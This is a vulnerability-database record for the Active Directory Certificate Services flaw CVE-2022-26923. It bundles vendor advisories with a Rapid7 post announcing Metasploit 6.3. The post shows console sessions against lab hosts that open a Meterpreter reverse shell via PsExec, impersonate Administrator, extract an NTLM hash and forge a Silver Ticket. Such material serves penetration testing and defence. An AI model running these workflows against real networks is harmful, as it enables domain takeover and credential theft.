{"zdi": [{"lastseen": "2022-05-19T01:45:11", "description": "This vulnerability allows network-adjacent attackers to escalate privileges on affected installations of Microsoft Windows Active Directory Certificate Services. Authentication is required to exploit this vulnerability. The specific flaw exists within the issuance of certificates. By including crafted data in a certificate request, an attacker can obtain a certificate that allows the attacker to authenticate to a domain controller with a high level of privilege. An attacker can leverage this vulnerability to escalate privileges and disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "zdi", "title": "Microsoft Windows Active Directory Certificate Services Improper Authorization Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2022-05-10T00:00:00", "id": "ZDI-22-729", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-729/", "cvss": {"score": 9.0, "vector": 
"AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-05-19T03:31:59", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Active Directory Domain Services Elevation of Privilege (CVE-2022-26923)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2022-05-10T00:00:00", "id": "CPAI-2022-0223", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-18T20:39:16", "description": "An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow for privilege escalation to SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-18T00:00:00", "type": "cisa_kev", "title": "Microsoft Active Directory Domain Services Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2022-08-18T00:00:00", "id": "CISA-KEV-CVE-2022-26923", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-01-10T22:22:09", "description": "Active Directory Domain Services Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T07:00:00", "type": "mscve", "title": "Active Directory Domain Services Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2022-05-10T08:00:00", "id": "MS:CVE-2022-26923", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26923", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2023-01-15T02:28:15", "description": "# CVE-2022-26923-Powershell-POC\nA powershell poc to load and aut...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T21:13:49", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2023-01-15T02:08:34", "id": "9282FF3E-73BE-5A7C-9FA4-01635B9C8E91", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, 
"privateArea": 1}], "attackerkb": [{"lastseen": "2023-01-04T14:54:54", "description": "Active Directory Domain Services Elevation of Privilege Vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "attackerkb", "title": "CVE-2022-26923", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2022-05-10T00:00:00", "id": "AKB:AAAF6327-F038-4D95-9914-564358284B96", "href": "https://attackerkb.com/topics/O4rd08Aizk/cve-2022-26923", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2023-01-30T15:01:53", "description": "\n\nThe Metasploit team is pleased to announce the release of Metasploit Framework 6.3, which adds native support for Kerberos authentication, incorporates new modules to conduct a wide range of Active Directory attacks, and simplifies complex workflows to support faster and more intuitive security testing.\n\n## Background\n\nKerberos is an [authentication 
protocol](<https://learn.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview>) that is commonly used to verify the identity of a user or a host in Windows environments. Kerberos support is built into most operating systems, but it\u2019s best known as the authentication protocol used in Active Directory implementations. Thousands of organizations worldwide rely on Active Directory to define user groups and permissions and to provision network resources.\n\nKerberos and Active Directory more broadly have been prime [attack targets](<https://attack.mitre.org/techniques/T1558/003/>) for years and have featured prominently in both threat actor and pen tester playbooks. A fresh wave of Active Directory attacks proliferated in mid-2021, after researchers Will Schroeder and Lee Christensen published a [technical whitepaper](<https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf>) on a slew of novel attack techniques targeting [Active Directory Certificate Services](<https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831740\\(v=ws.11\\)>) (AD CS). AD CS is a popular tool that allows administrators to implement public key infrastructure, and to issue and manage public key certificates. Abusing AD CS gave adversaries and red teams fresh opportunities to escalate privileges, move laterally, and establish persistence within Windows environments.\n\nMore than ever, first-class support for Active Directory and Kerberos-based attack techniques is critical to many pen testers and security researchers as they look to demonstrate risk to clients and the public. Plenty of new tooling has sprung up to facilitate offensive security operations in this space, but much of that tooling requires operators to manage their own tickets and environment variables, and/or is too narrowly scoped to support end-to-end attack workflows. 
As a result, many operators find themselves using multiple purpose-built tools to accomplish specific pieces of their playbooks, and then having to track ticket information manually to pursue broader objectives.\n\n## New in Metasploit 6.3\n\nMetasploit Framework 6.3 streamlines Kerberos and Active Directory attack workflows by allowing users to authenticate to multiple services via Kerberos and build attack chains with new modules that request, forge, and convert tickets between formats for use in other tools. Tickets are cached and stored in the Metasploit database as loot, which removes the need for manual management of environment variables. Attack workflows support pivoting over sessions out of the box, as users expect from Metasploit.\n\nHighlights include:\n\n * Native Kerberos authentication over HTTP, LDAP, MSSQL, SMB, and WinRM\n * The ability to request Ticket-Granting Tickets (TGT) and Ticket-Granting Server (TGS) from the Key Distribution Center (KDC) if the user obtains a password, NT hash, or encryption key; users can also request tickets via PKINIT with certificates issued from AD CS\n * Kerberos ticket inspection and debugging via the `auxiliary/admin/kerberos/inspect_ticket` module and the `auxiliary/admin/kerberos/keytab` module, which can generate Keytab files to allow decryption of Kerberos network traffic in Wireshark\n * Fully automated privilege escalation via Certifried ([CVE-2022\u201326923](<https://attackerkb.com/topics/iigmLeSKp1/cve-2022-26923-aka-certifried?referrer=blog>))\n\nSee a graph of [Metasploit authentication methods here](<https://gist.github.com/adfoster-r7/2b52461d3103ff2cd748c00f3a9e4ad2>).\n\nMSF 6.3 also includes new modules for key attack primitives in Active Directory Domain Services (AD DS) environments, including creation of computer accounts, abuse of Role Based Constrained Delegation (RBCD), and enumeration of 28 key data points via LDAP. 
AD DS modules include:\n\n * [auxiliary/admin/dcerpc/samr_computer](<https://github.com/rapid7/metasploit-framework/pull/16677>), which can add, lookup, or delete computer accounts from an Active Directory domain\n * [auxiliary/admin/ldap/rbcd](<https://github.com/rapid7/metasploit-framework/pull/17181>), which lets users configure an object in Active Directory to permit another object to impersonate any other account\n * [auxiliary/gather/ldap_query](<https://github.com/rapid7/metasploit-framework/pull/17071>), which allows for remote LDAP server queries, including custom and group queries\n\nIn recent years, adversaries have frequently abused misconfigurations in AD CS to escalate privileges and maintain access to networks. Metasploit 6.3 adds new modules to find and execute certificate attacks, including:\n\n * [auxiliary/admin/dcerpc/icpr_cert](<https://github.com/rapid7/metasploit-framework/pull/16939>), which supports issuing certs via AD CS\n * [auxiliary/gather/ldap_esc_vulnerable_cert_finder](<https://github.com/rapid7/metasploit-framework/pull/17122>), which supports hunting for ESC1, ESC 2 and ESC 3 vulnerable certificates on the target AD CS server using LDAP\n * [auxiliary/admin/kerberos/get_ticket](<https://github.com/rapid7/metasploit-framework/pull/17226>), which requests TGT/TGS tickets from the KDC using certificates by way of PKINIT\n\nAdditional features and improvements since [Metasploit 6.2](<https://www.rapid7.com/blog/post/2022/06/09/announcing-metasploit-6-2/>) include:\n\n * A [sixth `getsystem` technique](<https://github.com/rapid7/metasploit-framework/pull/16676>) that leverages the EFSRPC API to elevate a user with the `SeImpersonatePrivilege` permission to NT AUTHORITY\\SYSTEM ("EfsPotato")\n * Better Linux credential extraction through [native Mimipenguin support](<https://github.com/rapid7/metasploit-framework/pull/16688>) in Metasploit\n * Meterpreter [support](<https://github.com/rapid7/metasploit-framework/pull/16995>) for running 
Cobalt Strike\u2019s Beacon Object Files (BOF) \u2014 many thanks to the [TrustedSec](<https://twitter.com/TrustedSec/status/1617916890109673477>) team!\n * A [rewrite of Metasploit\u2019s datastore](<https://github.com/rapid7/metasploit-framework/pull/17475>) to resolve common errors, address edge cases, and improve user quality of life\n * Updated `show options` [support](<https://github.com/rapid7/metasploit-framework/pull/17526>) that lets module authors specify the conditions under which options are relevant to the user (e.g., a particular action or datastore value being set)\n\n## Example workflows\n\nBelow are some sample workflows for common actions supported in Metasploit 6.3. Additional workflows and context on Kerberos have been documented on the [Metasploit docs site](<https://docs.metasploit.com/>). This documentation is open-source, and contributions are welcome.\n\n### Kerberos Service Authentication\n\nOpening a WinRM session:\n \n \n msf6 > use auxiliary/scanner/winrm/winrm_login\n msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local\n \n [+] 192.168.123.13:88 - Received a valid TGT-Response\n [*] 192.168.123.13:5985 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin\n [+] 192.168.123.13:88 - Received a valid TGS-Response\n [*] 192.168.123.13:5985 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin\n [+] 192.168.123.13:88 - Received a valid delegation TGS-Response\n [+] 192.168.123.13:88 - Received AP-REQ. 
Extracting session key...\n [+] 192.168.123.13:5985 - Login Successful: demo.local\\Administrator:p4$$w0rd\n [*] Command shell session 1 opened (192.168.123.1:50722 -> 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000\n [*] Scanned 1 of 1 hosts (100% complete)\n [*] Auxiliary module execution completed\n msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1\n [*] Starting interaction with 1...\n \n Microsoft Windows [Version 10.0.14393]\n (c) 2016 Microsoft Corporation. All rights reserved.\n \n C:\\Users\\Administrator>\n \n\nQuerying LDAP for accounts:\n \n \n msf6 > use auxiliary/gather/ldap_query\n msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13\n [*] Running module against 192.168.123.13\n \n [+] 192.168.123.13:88 - Received a valid TGT-Response\n [*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin\n [+] 192.168.123.13:88 - Received a valid TGS-Response\n [*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin\n [+] 192.168.123.13:88 - Received a valid delegation TGS-Response\n [*] Discovering base DN automatically\n [+] 192.168.123.13:389 Discovered base DN: DC=adf3,DC=local\n CN=Administrator CN=Users DC=adf3 DC=local\n ==========================================\n \n Name Attributes\n ---- ----------\n badpwdcount 0\n pwdlastset 133184302034979121\n samaccountname Administrator\n useraccountcontrol 512\n ... 
etc ...\n \n\nRunning PsExec against a host:\n \n \n msf6 > use exploit/windows/smb/psexec\n msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local\n \n [*] Started reverse TCP handler on 192.168.123.1:4444\n [*] 192.168.123.13:445 - Connecting to the server...\n [*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'...\n [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response\n [*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin\n [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response\n [*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin\n [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response\n [*] 192.168.123.13:445 - Selecting PowerShell target\n [*] 192.168.123.13:445 - Executing the payload...\n [+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...\n [*] Sending stage (175686 bytes) to 192.168.123.13\n [*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000\n \n meterpreter >\n \n\nConnecting to a Microsoft SQL Server instance and running a query:\n \n \n msf6 > use auxiliary/admin/mssql/mssql_sql\n msf6 auxiliary(admin/mssql/mssql_sql) > rerun 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssql::domain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'\n [*] Reloading module...\n [*] Running module against 192.168.123.13\n 
\n [*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response\n [+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response\n [*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin\n [*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid\n [*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193)\n \n auth_scheme\n -----------\n KERBEROS\n \n [*] Auxiliary module execution completed\n \n\n### Kerberos klist support\n\nWhen running Metasploit with a database, all Kerberos tickets will be persisted into the database. The `klist` command can be used to view these persisted tickets. It is a top-level command and can be run even if a module is in use:\n \n \n msf6 > klist\n Kerberos Cache\n ==============\n host principal sname issued status path\n ---- --------- ----- ------ ------ ----\n 192.168.159.10 smcintyre@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2022-12-15 18:25:48 -0500 >>expired<< /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_867855.bin\n 192.168.159.10 smcintyre@MSFLAB.LOCAL cifs/DC.msflab.local@MSFLAB.LOCAL 2022-12-15 18:25:48 -0500 >>expired<< /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_699376.bin\n 192.168.159.10 smcintyre@MSFLAB.LOCAL krbtgt/msflab.local@MSFLAB.LOCAL 2022-12-16 14:51:50 -0500 valid /home/smcintyre/.msf4/loot/20221216145149_default_192.168.159.10_mit.kerberos.cca_782487.bin\n 192.168.159.10 smcintyre@MSFLAB.LOCAL cifs/DC.msflab.local@MSFLAB.LOCAL 2022-12-16 17:07:48 -0500 valid /home/smcintyre/.msf4/loot/20221216170747_default_192.168.159.10_mit.kerberos.cca_156303.bin\n 192.168.159.10 smcintyre@MSFLAB.LOCAL cifs/DC@MSFLAB.LOCAL 2022-12-16 17:08:26 -0500 valid /home/smcintyre/.msf4/loot/20221216170825_default_192.168.159.10_mit.kerberos.cca_196712.bin\n 192.168.159.10 
smcintyre@MSFLAB.LOCAL krbtgt/msflab.local@MSFLAB.LOCAL 2022-12-16 15:03:03 -0500 valid /home/smcintyre/.msf4/loot/20221216150302_default_192.168.159.10_mit.kerberos.cca_729805.bin\n 192.168.159.10 aliddle@MSFLAB.LOCAL krbtgt/msflab.local@MSFLAB.LOCAL 2022-12-16 15:25:16 -0500 valid /home/smcintyre/.msf4/loot/20221216152515_default_192.168.159.10_mit.kerberos.cca_934698.bin\n \n\nThe `klist` command also supports the `-v` flag for showing additional detail.\n\n### Requesting tickets\n\nThe `auxiliary/admin/kerberos/get_ticket` module can be used to request TGT/TGS tickets from the KDC. For instance the following example will request a TGS impersonating the Administrator account:\n \n \n msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local user=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator\n [*] Running module against 10.0.0.24\n \n [*] 10.0.0.24:88 - Getting TGS impersonating Administrator@mylab.local (SPN: cifs/dc02.mylab.local)\n [+] 10.0.0.24:88 - Received a valid TGT-Response\n [*] 10.0.0.24:88 - TGT MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin\n [+] 10.0.0.24:88 - Received a valid TGS-Response\n [+] 10.0.0.24:88 - Received a valid TGS-Response\n [*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin\n [*] Auxiliary module execution completed\n \n\nThe `auxiliary/admin/kerberos/get_ticket` module also supports authentication via PKINIT with the `CERT_FILE` and `CERT_PASSWORD` options. When used with the `GET_HASH` action, a [user-to-user (U2U) authentication](<https://learn.microsoft.com/en-us/archive/blogs/openspecification/how-kerberos-user-to-user-authentication-works>) TGS will be requested, from which the NT hash can be calculated. 
This allows a user to obtain the NTLM hash for the account for which the certificate was issued.\n \n \n msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhosts=192.168.159.10 cert_file=/home/smcintyre/.msf4/loot/20230126155141_default_192.168.159.10_windows.ad.cs_404736.pfx\n [*] Running module against 192.168.159.10\n \n [+] 192.168.159.10:88 - Received a valid TGT-Response\n [*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_813470.bin\n [*] 192.168.159.10:88 - Getting NTLM hash for smcintyre@msflab.local\n [+] 192.168.159.10:88 - Received a valid TGS-Response\n [*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_485504.bin\n [+] Found NTLM hash for smcintyre: aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f\n [*] Auxiliary module execution completed\n msf6 auxiliary(admin/kerberos/get_ticket) >\n \n\n### Forging tickets\n\nAfter compromising a KDC or service account, users can forge Kerberos tickets for persistence. 
The `auxiliary/admin/kerberos/forge_ticket` module can forge Golden Tickets with the KRBTGT account hash, or Silver Tickets with service hashes:\n \n \n msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_SILVER domain=demo.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=fbd103200439e14d4c8adad675d5f244 user=Administrator spn=cifs/dc3.demo.local\n \n [+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin\n [*] Auxiliary module execution completed\n \n\n### Kerberos debugging support\n\nMetasploit 6.3 also introduces new tools that will make it easier for module developers and researchers to target Kerberos environments.\n\nThe new `auxiliary/admin/kerberos/inspect_ticket` module can show the contents of a Kerberos ticket, including decryption support if the key is known after running the `auxiliary/gather/windows_secrets_dump` module or similar:\n \n \n msf6 > use auxiliary/admin/kerberos/inspect_ticket\n msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket\n Primary Principal: Administrator@WINDOMAIN.LOCAL\n Ccache version: 4\n \n Creds: 1\n Credential[0]:\n Server: cifs/dc.windomain.local@WINDOMAIN.LOCAL\n Client: Administrator@WINDOMAIN.LOCAL\n Ticket etype: 18 (AES256)\n Key: 3436643936633032656264663030393931323461366635653364393932613763\n Ticket Length: 978\n Subkey: false\n Addresses: 0\n Authdatas: 0\n Times:\n Auth time: 2022-11-21 13:52:00 +0000\n Start time: 2022-11-21 13:52:00 +0000\n End time: 2032-11-18 13:52:00 +0000\n Renew Till: 2032-11-18 13:52:00 +0000\n Ticket:\n Ticket Version Number: 5\n Realm: WINDOMAIN.LOCAL\n Server Name: cifs/dc.windomain.local\n Encrypted Ticket Part:\n Ticket etype: 18 (AES256)\n Key Version Number: 2\n Decrypted (with key: 4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326):\n Times:\n Auth time: 
2022-11-21 13:52:00 UTC\n Start time: 2022-11-21 13:52:00 UTC\n End time: 2032-11-18 13:52:00 UTC\n Renew Till: 2032-11-18 13:52:00 UTC\n Client Addresses: 0\n Transited: tr_type: 0, Contents: \"\"\n Client Name: 'Administrator'\n Client Realm: 'WINDOMAIN.LOCAL'\n Ticket etype: 18 (AES256)\n Encryption Key: 3436643936633032656264663030393931323461366635653364393932613763\n Flags: 0x50a00000 (FORWARDABLE, PROXIABLE, RENEWABLE, PRE_AUTHENT)\n PAC:\n Validation Info:\n Logon Time: 2022-11-21 13:52:00 +0000\n Logoff Time: Never Expires (inf)\n Kick Off Time: Never Expires (inf)\n Password Last Set: No Time Set (0)\n Password Can Change: No Time Set (0)\n Password Must Change: Never Expires (inf)\n Logon Count: 0\n Bad Password Count: 0\n User ID: 500\n Primary Group ID: 513\n User Flags: 0\n User Session Key: 00000000000000000000000000000000\n User Account Control: 528\n Sub Auth Status: 0\n Last Successful Interactive Logon: No Time Set (0)\n Last Failed Interactive Logon: No Time Set (0)\n Failed Interactive Logon Count: 0\n SID Count: 0\n Resource Group Count: 0\n Group Count: 5\n Group IDs:\n Relative ID: 513, Attributes: 7\n Relative ID: 512, Attributes: 7\n Relative ID: 520, Attributes: 7\n Relative ID: 518, Attributes: 7\n Relative ID: 519, Attributes: 7\n Logon Domain ID: S-1-5-21-3541430928-2051711210-1391384369\n Effective Name: 'Administrator'\n Full Name: ''\n Logon Script: ''\n Profile Path: ''\n Home Directory: ''\n Home Directory Drive: ''\n Logon Server: ''\n Logon Domain Name: 'WINDOMAIN.LOCAL'\n Client Info:\n Name: 'Administrator'\n Client ID: 2022-11-21 13:52:00 +0000\n Pac Server Checksum:\n Signature: 04e5ab061c7a909a26b122c2\n Pac Privilege Server Checksum:\n Signature: 710bb183858257f41021bd7e\n \n\nMetasploit has also added first-class support for the [Keytab](<https://web.mit.edu/kerberos/www/krb5-latest/doc/basic/keytab_def.html>) file format for storing the encryption keys of principals. 
